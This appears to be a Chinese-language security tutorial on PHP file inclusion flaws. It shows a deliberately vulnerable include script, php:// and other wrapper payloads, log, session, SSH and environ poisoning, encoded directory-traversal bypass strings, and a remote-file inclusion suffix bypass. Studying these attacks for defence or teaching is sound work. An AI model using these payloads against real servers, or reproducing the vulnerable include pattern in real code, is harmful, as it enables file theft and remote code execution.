PHP文件包含漏洞

0x01 文件包含函数

• include()
• include_once()
• require()
• require_once() 这里include()函数如果在包含的过程中发生错误，会发出警告，但是会继续执行后续代码；
  require()函数如果在包含的过程中发生错误，会报错退出，并且不再执行之后的代码。
  include_once()和require_once()的功能跟include()和require()类似，只不过前者如果已经包含了文件，那么就不会包含第二次，以免出现函数重定义或变量重赋值的问题。

以上四个函数不管包含的文件类型是什么，都会当作php文件进行解析，例如
phpinfo.txt

<?php
phpinfo();

lfi.php

<?php
$temp=$_GET['c'];
include($temp);
?>

成功执行phpinfo()！

0x02 文件包含分类

1. LFI（本地文件包含）

本地文件包含就是包含服务器本地的文件。

2. RFI（远程文件包含）

远程文件包含就是包含远程服务器上的文件，这样我们就可以自定义自己想要执行的代码，因此危害比较大。远程文件包含需要一定的条件
php.ini配置

allow_url_fopen=On（默认开启）
allow_url_include=On（默认关闭）

0x03 php伪协议

假设服务器lfi.php内容如下

<?php
$temp = $_GET['c'];
include($temp);
?>

php://input

使用条件

allow_url_include=On（默认关闭）
allow_url_fopen不做要求（默认开启）

php://filter

使用条件：无

··
？c=php://filter/read=convert.base64-encode/resource=xxx
或者
?c=php://filter/convert.base64-encode/resource=xxx
···
通过指定resource的值来读取文件，读取的文件是base64加密后的，读取到后解一下就好了。

phar://*

使用条件：php版本大于等于5.3.0

假设需要读取的文件是phpinfo.txt，将其压缩成zip文件（phpinfo.zip）

然后指定文件的绝对路径

?c=phar://C://wamp64/www/phpinfo.zip/phpinfo.txt

或者使用相对路径（这里phpinfo.zip就在当前路径）

?c=phar://phpinfo.zip/phpinfo.txt

zip://

使用条件：php版本大于等于5.3.0

zip://与phar://的使用类似，但是需要绝对路径， zip文件后面要跟%23加zip文件里的文件

?c=zip://C:/wamp64/www/phpinfo.zip%23phpinfo.txt

data:URL schema

使用条件：
php版本大于等于5.2.0
allow_url_include=On(默认关闭)
allow_url_fopen=On(默认开启)

?c=data:text/plain,<?php phpinfo();?>

或者

?c=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

session文件包含

使用条件：session文件路径已知，并且内容部分可控

session文件路径可以在phpinfo中session.save_path得到

一般情况下session文件都在/tmp目录下
命名格式：sess_[phpsessid]，而phpsessid可以在cookie中得到

要包含并利用的话，需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候，可以先包含进session文件，观察里面的内容，然后根据里面的字段来发现可控的变量，从而利用变量来写入payload，并之后再次包含从而执行php代码。

包含日志文件

使用条件： 需要知道日志文件的目录，并且日志文件可读

当我们访问服务器的时候，访问的请求会被记录到access.log，当发生错误的时候会把错误写入到error.log，一般日志的路径linux下是/var/logs/apache2，windows下wamp在/wamp/logs
但是如果我们直接请求的话，一些特殊字符会被url编码从而导致包含后无法解析

可以用burp抓包后改包即可。

之后就可以包含进行利用啦

包含ssh-log

使用条件：ssh日志路径已知，并且可读，默认情况下在/var/log/auth.log

ssh '<?php phpinfo(); ?>'@remotehost

之后密码随便写
之后包含日志文件就好啦

environ

使用条件：

1. php以cgi方式运行，这样environ才会保持UA头。
2. environ文件存储位置已知，且environ文件可读。

proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码，则php代码会被写入到environ中。之后再包含它，即可。

条件竞争

0x04 绕过姿势

指定前缀

<?php
$file = $_GET['file'];
include '/var/www/html/'.$file;
?>

目录遍历

可以用../进行目录遍历，访问其他目录的文件

编码

但有的时候，服务器通常会把../过滤掉，这个时候可以用编码进行绕过
利用url编码
%2e%2e%5c
..%5c
%2e%2e\
%2e%2e%2f
..%2f
%2e%2e/
../
..\

二次编码
%252e%252e%255c
%252e%252e%252f
../
..\

容器/服务器的编码方式
../
..%c0%af
%c0%ae%c0%ae/
注：Why does Directory traversal attack %C0%AF work?

%c0%ae%c0%ae/
注：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）
Apache Tomcat Directory Traversal
..\
..%c1%9c

指定后缀

<?php
$file = $_GET['file'];
include $file.'/test/test.php';
?>

?问号绕过

index.php?file=http://remoteaddr/remoteinfo.txt?

问号后面的部分/test/test.php，也就是指定的后缀被当作query从而被绕过。注意需要把#进行url编码为%23。

利用zip协议

可以构造跟后缀一样的路径，再打包成zip文件，然后利用zip协议包含即可